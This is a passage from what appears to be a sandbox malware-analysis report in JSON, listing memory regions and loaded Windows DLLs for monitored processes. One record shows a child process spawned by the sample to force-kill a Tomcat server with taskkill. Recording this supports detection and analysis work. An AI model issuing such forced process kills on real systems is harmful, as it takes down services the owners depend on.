"size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4546", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:34.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3637247, "entry_point": 0, "filename": null, "id": "region_4547", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:34.218", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4548", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:34.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4549", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:34.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1208319, "entry_point": 0, "filename": null, "id": "region_4550", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1253375, "entry_point": 0, "filename": null, "id": "region_4551", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1327103, "entry_point": 1310720, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4552", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_4553", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4554", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_4555", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 6164479, "entry_point": 0, "filename": null, "id": "region_4556", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 8454143, "entry_point": 7667712, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4557", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 7667712, "timestamp": "00:01:34.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 8912895, "entry_point": 0, "filename": null, "id": "region_4558", "name": "private_0x0000000000840000", "norm_filename": null, "region_type": "private_memory", "start_va": 8650752, "timestamp": "00:01:34.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9306111, "entry_point": 0, "filename": null, "id": "region_4559", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:01:34.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 10289151, "entry_point": 0, "filename": null, "id": "region_4560", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:01:34.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11993088, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 0, "filename": null, "id": "region_4561", "name": "pagefile_0x0000000000b70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11993088, "timestamp": "00:01:34.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4562", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:34.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4563", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:34.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_4564", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:01:34.321", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958526975, "entry_point": 1958292296, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4565", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:34.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959043071, "entry_point": 1959007386, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4566", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:34.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 11337727, "entry_point": 0, "filename": null, "id": "region_4567", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:01:34.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35258367, "entry_point": 0, "filename": null, "id": "region_4568", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:01:34.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958739968, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958767385, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4569", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958739968, "timestamp": "00:01:34.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33423359, "entry_point": 0, "filename": null, "id": "region_4570", "name": "private_0x0000000001fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33161216, "timestamp": "00:01:34.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34013183, "entry_point": 0, "filename": null, "id": "region_4571", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:01:34.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 38203391, "entry_point": 35258368, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4572", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35258368, "timestamp": "00:01:34.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4573", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:34.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4574", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:34.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4575", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:34.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4576", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:34.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_4577", "name": "private_0x0000000000600000", "norm_filename": null, "region_type": "private_memory", "start_va": 6291456, "timestamp": "00:01:34.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_4578", "name": "private_0x0000000002080000", "norm_filename": null, "region_type": "private_memory", "start_va": 34078720, "timestamp": "00:01:34.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_4579", "name": "private_0x00000000020e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34471936, "timestamp": "00:01:34.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38928384, "type": "region", "version": 1 }, "end_va": 39190527, "entry_point": 0, "filename": null, "id": "region_4580", "name": "private_0x0000000002520000", "norm_filename": null, "region_type": "private_memory", "start_va": 38928384, "timestamp": "00:01:34.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958674432, "type": "region", "version": 1 }, "end_va": 1958735871, "entry_point": 1958683040, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4581", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958674432, "timestamp": "00:01:34.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4582", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:34.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4583", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:34.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1787297792, "type": "region", "version": 1 }, "end_va": 1787912191, "entry_point": 1787427001, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4584", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1787297792, "timestamp": "00:01:34.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958641663, "entry_point": 1958548277, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4585", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:34.395", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM tomcat7_x64.exe /IM tomcat7_x64.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_39", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 39, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4586", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:34.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4587", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:34.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4588", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:34.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4589", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:34.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4590", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:34.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_4591", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:34.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_4592", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:01:34.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4087807, "entry_point": 4021385, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4593", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:01:34.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4594", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:34.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4595", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:34.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4596", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4597", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4598", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4599", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4600", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4601", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4602", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:34.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_4603", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:01:34.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4604", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:34.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4605", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:34.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4606", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:34.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 